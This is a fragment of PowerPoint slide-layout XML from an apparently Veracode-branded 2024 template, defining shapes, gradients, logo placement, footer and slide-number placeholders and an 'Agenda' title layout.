          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 3471920 w 4751781"/>
              <a:gd name="connsiteY0" fmla="*/ 60628 h 2760161"/>
              <a:gd name="connsiteX1" fmla="*/ 4019240 w 4751781"/>
              <a:gd name="connsiteY1" fmla="*/ 60628 h 2760161"/>
              <a:gd name="connsiteX2" fmla="*/ 4215585 w 4751781"/>
              <a:gd name="connsiteY2" fmla="*/ 60628 h 2760161"/>
              <a:gd name="connsiteX3" fmla="*/ 4751781 w 4751781"/>
              <a:gd name="connsiteY3" fmla="*/ 60628 h 2760161"/>
              <a:gd name="connsiteX4" fmla="*/ 4751781 w 4751781"/>
              <a:gd name="connsiteY4" fmla="*/ 754790 h 2760161"/>
              <a:gd name="connsiteX5" fmla="*/ 4751781 w 4751781"/>
              <a:gd name="connsiteY5" fmla="*/ 2760161 h 2760161"/>
              <a:gd name="connsiteX6" fmla="*/ 4019240 w 4751781"/>
              <a:gd name="connsiteY6" fmla="*/ 2760161 h 2760161"/>
              <a:gd name="connsiteX7" fmla="*/ 4019240 w 4751781"/>
              <a:gd name="connsiteY7" fmla="*/ 754790 h 2760161"/>
              <a:gd name="connsiteX8" fmla="*/ 3471920 w 4751781"/>
              <a:gd name="connsiteY8" fmla="*/ 754790 h 2760161"/>
              <a:gd name="connsiteX9" fmla="*/ 1804375 w 4751781"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 2760161"/>
              <a:gd name="connsiteX10" fmla="*/ 3608194 w 4751781"/>
              <a:gd name="connsiteY10" fmla="*/ 1807712 h 2760161"/>
              <a:gd name="connsiteX11" fmla="*/ 3390028 w 4751781"/>
              <a:gd name="connsiteY11" fmla="*/ 2660841 h 2760161"/>
              <a:gd name="connsiteX12" fmla="*/ 3329166 w 4751781"/>
              <a:gd name="connsiteY12" fmla="*/ 2760161 h 2760161"/>
              <a:gd name="connsiteX13" fmla="*/ 2349830 w 4751781"/>
              <a:gd name="connsiteY13" fmla="*/ 2760161 h 2760161"/>
              <a:gd name="connsiteX14" fmla="*/ 2379793 w 4751781"/>
              <a:gd name="connsiteY14" fmla="*/ 2743088 h 2760161"/>
              <a:gd name="connsiteX15" fmla="*/ 2875653 w 4751781"/>
              <a:gd name="connsiteY15" fmla="*/ 1813275 h 2760161"/>
              <a:gd name="connsiteX16" fmla="*/ 1804375 w 4751781"/>
              <a:gd name="connsiteY16" fmla="*/ 693606 h 2760161"/>
              <a:gd name="connsiteX17" fmla="*/ 733097 w 4751781"/>
              <a:gd name="connsiteY17" fmla="*/ 1799369 h 2760161"/>
              <a:gd name="connsiteX18" fmla="*/ 1228352 w 4751781"/>
              <a:gd name="connsiteY18" fmla="*/ 2741095 h 2760161"/>
              <a:gd name="connsiteX19" fmla="*/ 1261425 w 4751781"/>
              <a:gd name="connsiteY19" fmla="*/ 2760161 h 2760161"/>
              <a:gd name="connsiteX20" fmla="*/ 281478 w 4751781"/>
              <a:gd name="connsiteY20" fmla="*/ 2760161 h 2760161"/>
              <a:gd name="connsiteX21" fmla="*/ 218183 w 4751781"/>
              <a:gd name="connsiteY21" fmla="*/ 2656404 h 2760161"/>
              <a:gd name="connsiteX22" fmla="*/ 0 w 4751781"/>
              <a:gd name="connsiteY22" fmla="*/ 1799369 h 2760161"/>
              <a:gd name="connsiteX23" fmla="*/ 1804375 w 4751781"/>
              <a:gd name="connsiteY23" fmla="*/ 0 h 2760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751781" h="2760161">
                <a:moveTo>
                  <a:pt x="3471920" y="60628"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4019240" y="60628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4215585" y="60628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4751781" y="60628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4751781" y="754790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4751781" y="2760161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4019240" y="2760161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4019240" y="754790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3471920" y="754790"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1804375" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2815581" y="0"/>
                  <a:pt x="3608194" y="794281"/>
                  <a:pt x="3608194" y="1807712"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3608194" y="2116414"/>
                  <a:pt x="3529107" y="2407082"/>
                  <a:pt x="3390028" y="2660841"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3329166" y="2760161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2349830" y="2760161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2379793" y="2743088"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2717937" y="2523895"/>
                  <a:pt x="2875271" y="2124549"/>
                  <a:pt x="2875653" y="1813275"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2875653" y="1380536"/>
                  <a:pt x="2584194" y="693606"/>
                  <a:pt x="1804375" y="693606"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1065160" y="693606"/>
                  <a:pt x="733097" y="1339932"/>
                  <a:pt x="733097" y="1799369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="733097" y="2114850"/>
                  <a:pt x="890049" y="2519191"/>
                  <a:pt x="1228352" y="2741095"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1261425" y="2760161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281478" y="2760161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218183" y="2656404"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="79088" y="2401466"/>
                  <a:pt x="0" y="2109461"/>
                  <a:pt x="0" y="1799369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="807075"/>
                  <a:pt x="809855" y="0"/>
                  <a:pt x="1804375" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="22225" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0">
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184063435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Content_Dark_BLANK">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0095D893-F526-F932-B2E6-5FA4DB36B3CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65C85C8-41FA-5E37-80FF-2F6B627AC023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1635285458"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition p14:dur="0" advClick="0" advTm="10000"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition advClick="0" advTm="10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Agenda_Light_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="FFFFFF"/>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D5F56C1-454D-F578-2FB3-AF4D51DAECC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4722471" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="4EA4B2"/>
              </a:gs>
              <a:gs pos="37000">
                <a:srgbClr val="2C8EAD"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="001F29"/>
              </a:gs>
              <a:gs pos="84000">
                <a:schemeClr val="tx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pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFEB4DBE-6C42-75DA-4F88-DB83B25969D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="16000"/>
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId3">
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="7964"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:saturation sat="377000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="55342" b="60051"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1800000">
            <a:off x="-1901772" y="1004912"/>
            <a:ext cx="6479289" cy="6171847"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6479289"/>
              <a:gd name="connsiteY0" fmla="*/ 232645 h 6171847"/>
              <a:gd name="connsiteX1" fmla="*/ 402952 w 6479289"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6171847"/>
              <a:gd name="connsiteX2" fmla="*/ 4072618 w 6479289"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6171847"/>
              <a:gd name="connsiteX3" fmla="*/ 6479289 w 6479289"/>
              <a:gd name="connsiteY3" fmla="*/ 4168477 h 6171847"/>
              <a:gd name="connsiteX4" fmla="*/ 6479289 w 6479289"/>
              <a:gd name="connsiteY4" fmla="*/ 4410761 h 6171847"/>
              <a:gd name="connsiteX5" fmla="*/ 3429000 w 6479289"/>
              <a:gd name="connsiteY5" fmla="*/ 6171847 h 6171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9289" h="6171847">
                <a:moveTo>
                  <a:pt x="0" y="232645"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="402952" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4072618" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6479289" y="4168477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6479289" y="4410761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429000" y="6171847"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Title Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C5EAAB-9247-204B-A613-8A0A50BA7DB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397497" y="449808"/>
            <a:ext cx="2471828" cy="98552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b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{811BD228-B999-064B-BCA6-121266B74516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94823372-C844-4842-9C0C-0C37016D9E55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D9B91BC-4D04-FB92-5794-9542EF5EE4B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5514975" y="757195"/>
            <a:ext cx="5786388" cy="5272129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190413198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0_Agenda_Light_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="FFFFFF"/>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D5F56C1-454D-F578-2FB3-AF4D51DAECC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3806085" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="1B6D87"/>
              </a:gs>
              <a:gs pos="98000">
                <a:schemeClr val="tx2"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{751E6B8A-2765-31C8-D279-55E067CE38F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2027558" y="-12415"/>
            <a:ext cx="1778527" cy="6882829"/>
            <a:chOff x="5796289" y="-63014"/>
            <a:chExt cx="1795782" cy="6949602"/>
          </a:xfrm>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:schemeClr val="accent4">
                  <a:alpha val="11339"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="19000">
                <a:schemeClr val="tx2">
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D3EA1F0-1233-C536-78E5-D8EC9A31747E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="641440"/>
              <a:ext cx="1795782" cy="1362196"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="1795782" cy="1362196"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FF09AEA-ECDE-B857-156B-1862D3A0D57F}"/>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2" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E6DDFA-E16A-E188-1951-8912C4D58F0B}"/>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4" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9594449-B204-7AF5-232C-CAB0102ADE3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6936261" y="1992224"/>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16" name="Group 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3523B38A-4A52-74FA-A9E0-E78CA97EA3B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="-63014"/>
              <a:ext cx="1795782" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="1795782" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{796A4CB6-4B50-7F0F-58FA-013737BEF44B}"/>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9" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9065AF31-F147-B2CB-E523-B5F93AA10462}"/>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17" name="Group 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1510615-7F7D-5B76-1E78-BE0603C1E479}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="2037908"/>
              <a:ext cx="1795782" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="1795782" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E27A20FF-C3CD-54EE-C232-B87714155AF4}"/>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6" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{877A6FC5-28A3-9435-E8A8-72FAB78BFEF2}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Graphic 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD5385CB-637E-9B4A-0E33-44E0912D40BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5796289" y="1339674"/>
              <a:ext cx="870505" cy="659272"/>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nvGrpSpPr>
            <p:cNvPr id="20" name="Group 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7081A14D-18E6-2DE3-1D67-0B358E6F6219}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="3434376"/>
              <a:ext cx="1795782" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="1795782" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{500E305B-88D3-31B1-C8F7-1364A653AE35}"/>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3" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{286BBA9E-ECC3-BDC1-7A5D-2F30FADA35BD}"/>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22" name="Group 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2023B6C8-79FF-F092-80C5-A851B286D1C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="2736142"/>
              <a:ext cx="1795782" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
